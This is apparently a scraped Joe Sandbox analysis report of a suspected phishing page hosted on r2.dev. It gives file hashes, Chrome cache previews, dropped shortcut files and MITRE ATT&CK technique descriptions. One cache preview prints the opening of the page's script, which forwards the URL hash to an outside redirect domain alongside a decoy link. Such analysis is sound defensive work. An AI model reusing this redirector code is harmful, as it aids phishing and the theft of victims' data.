Preview:	L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........H........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 18:55:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	4.001554711502877
Encrypted:	false
SSDEEP:
MD5:	072B18650295B3111399EE6C1402105B
SHA1:	2C4A25EA04930DB014561B4F772EA262C0B92E26
SHA-256:	4FA9157A3C6B0001745DACC6C13A8A9A300EDB7F6286AF62C1E8288EC159071D
SHA-512:	F8B11439295F84A82F71D07BEF7FC1B0D558DCC3CB6C84A774B2768793634B8AC07AD3B7F67EDF074F7E1F313DD405AB5EF5A65D0EC1F02ED90235359A182049
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....zG8.;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........H........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 18:55:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.990845288047855
Encrypted:	false
SSDEEP:
MD5:	D021038FAA97DC3F001B4062CE0BFFC9
SHA1:	4F373B9D013F7AB9330577C315C2344F2266C796
SHA-256:	EA4104C3FE54EACB3CDE3579EDA6F5477AF93A630F6AD7EA30B7A4AB2D5A4A83
SHA-512:	158FC53C0C454D3C82CEDA903A5BC247363921D98DEB435E031B3C6CEE287339840C35014AA5CA628EE928DB995D73E59BD4E87D955BE9EB046A5A0780A46F5F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......p8.;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........H........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 20 18:55:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	4.001252538580025
Encrypted:	false
SSDEEP:
MD5:	FB11AE1ECF1AD2129FC0682309C4FA2E
SHA1:	69102A10D9D841B418A75C9859FF32AECC6ABDFB
SHA-256:	D726A15C3AD151B210132D9578B2170D5AE27FFBA85AB2AEBA6EA22696D03D48
SHA-512:	35DA111FFDF92CBF30C4E38BD4BE42BEC90B310E2C2A5EE658CCAA7FD8E724AA50CC7975D1705146F627C53716B57646AECA555E129E1A09BED28084CB17C33E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....b68.;......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.ItY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VtY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VtY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VtY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VtY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........H........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65333), with CRLF line terminators
Category:	downloaded
Size (bytes):	104672
Entropy (8bit):	5.96245022308748
Encrypted:	false
SSDEEP:
MD5:	032917F2008F018FEF89C240FFBB4F75
SHA1:	C8901AB30C57EAE38ED67F621515FE0A8ECC1FF0
SHA-256:	13501E57BD34D09C2A9D8C33383C94D1C29C10CE63FFD0BF0CA055B39A4C033A
SHA-512:	7C5A81D591E597A93BBD93D673B213EA316C405609ECB96BFDA5EAEAC913F49227D68DADDEB79A768DAE7A13AFE68DA0109DB22F527FB66FD46B031EC454120A
Malicious:	false
Reputation:	unknown
URL:	https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html
Preview:	<script nonce="MTIxNzk4NDkwOSwzNzAwMzA5ODQw">....let ulink = "https://idiontsyashie.top/ppp/#".. let ai = `${ulink}${window.location.hash.substring(1)}`;.. let bi = "https://amazon.com/";....let imageUrl = 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAkACQAAD/4gHbSUNDX1BST0ZJTEUAAQEAAAHLAAAAAAJAAABtbnRyUkdCIFhZWiAAAAAAAAAAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLVF0BQ8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlyWFlaAAAA8AAAABRnWFlaAAABBAAAABRiWFlaAAABGAAAABR3dHB0AAABLAAAABRjcHJ0AAABQAAAAAxyVFJDAAABTAAAACBnVFJDAAABTAAAACBiVFJDAAABTAAAACBkZXNjAAABbAAAAF9YWVogAAAAAAAAb58AADj0AAADkVhZWiAAAAAAAABilgAAt4cAABjcWFlaIAAAAAAAACShAAAPhQAAttNYWVogAAAAAAAA808AAQAAAAEWwnRleHQAAAAATi9BAHBhcmEAAAAAAAMAAAACZmYAAPKnAAANWQAAE9AAAApbZGVzYwAAAAAAAAAFc1JHQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/2wBDAAQDAwQDAwQEAwQFBAQFBgoHBgYGBg0JCggKDw0QEA8NDw4RExgUERIXEg4PFRwVFxkZGxsbEBQdHx0aHxgaGxr/

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	128
Entropy (8bit):	4.9987622869624495
Encrypted:	false
SSDEEP:
MD5:	96075B4557B7B4CCB8CA4040FE23AFFE
SHA1:	5AB9769DC4CB5EFC79A10FB29135459E3427E7F8
SHA-256:	230E0E01A8DD20DA45BEC0E444084C657542738C3A8DF2AE466A91934A0D4E97
SHA-512:	103180D4391114E7A453E808AA77F7D2E498A08092BDB3405D0E13946ECC7FDECB7B081BFD8740E6BBC2CBCEF888342D28AC86AE6B8C47549CAC6A96CD17E1CA
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSLAm0hLERnwCNrRIFDQss0doSBQ2PdYHqEgUNDhLnJxIFDZWvjf0SBQ2Vr439EiwJzL9tL2av23wSBQ0LLNHaEgUNj3WB6hIFDQ4S5ycSBQ2Vr439EgUNla-N_Q==?alt=proto
Preview:	Ci0KBw0LLNHaGgAKBw2PdYHqGgAKBw0OEucnGgAKBw2Vr439GgAKBw2Vr439GgAKLQoHDQss0doaAAoHDY91geoaAAoHDQ4S5ycaAAoHDZWvjf0aAAoHDZWvjf0aAA==

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47992), with no line terminators
Category:	downloaded
Size (bytes):	47992
Entropy (8bit):	5.605846858683577
Encrypted:	false
SSDEEP:
MD5:	CF3402D7483B127DED4069D651EA4A22
SHA1:	BDE186152457CACF9C35477B5BDDA5BCB56B1F45
SHA-256:	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
SHA-512:	9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt\|\|function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create\|\|function(t){var e;return n.prototype=t,e=new n,n.prototype=null

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (611)
Category:	downloaded
Size (bytes):	27150
Entropy (8bit):	4.357340680151037
Encrypted:	false
SSDEEP:
MD5:	46DD133EE00DC1BAE5E4EEBA7B88432F
SHA1:	8AF86A4AC91CE48C062216FB94A6E1D57618A19B
SHA-256:	9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
SHA-512:	CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
Malicious:	false
Reputation:	unknown
URL:	https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/favicon.ico
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (48316), with no line terminators
Category:	downloaded
Size (bytes):	48316
Entropy (8bit):	5.6346993394709
Encrypted:	false
SSDEEP:
MD5:	2CA03AD87885AB983541092B87ADB299
SHA1:	1A17F60BF776A8C468A185C1E8E985C41A50DC27
SHA-256:	8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
SHA-512:	13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create\|\|function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init\|\|(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.120950594454667
Encrypted:	false
SSDEEP:
MD5:	B09F000BFB98ABD880BC77E05456FFEA
SHA1:	FBADFA7F41B709507692B8FCEA597474EED91E2C
SHA-256:	0A721532497036FF7D8B228DD8D4EF5E91777B0BD2B11F49F5B2CCDDD55EB259
SHA-512:	F2E0CF9FD6D14EAF9BE953052515A598E9F96186FB82D5FA8D3E9B01F9706284DE8DDDF343AB69CF566EDEB28C659D65E0D608F99A5717A7CBFB2CC48ADA15A7
Malicious:	false
Reputation:	unknown
Preview:	{"detail":"Method \"GET\" not allowed."}

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:
MD5:	FDDC31DE967A4B3DA76393419B55F9C9
SHA1:	286EFCC8CE25D3155D352AAB208056B0EE3009EA
SHA-256:	DB7DE230E919C4DAD9B3F2599BB09E36DB4D3DECCB86AB3577E9EA1CDBDC5E1F
SHA-512:	E27F55BD7A48B5CBA9B4A244507B409690555B277BCDFF1DEC5DE3CE76B2D43EB3BE2DA958C1BBD90E6375AEAD14C9E996DC7EE9298D70D698458702CB13C93A
Malicious:	false
Reputation:	unknown
Preview:	{"ip":"8.46.123.75"}

Static File Info

⊘No static file info

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Static File Info

Windows Analysis Report
https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html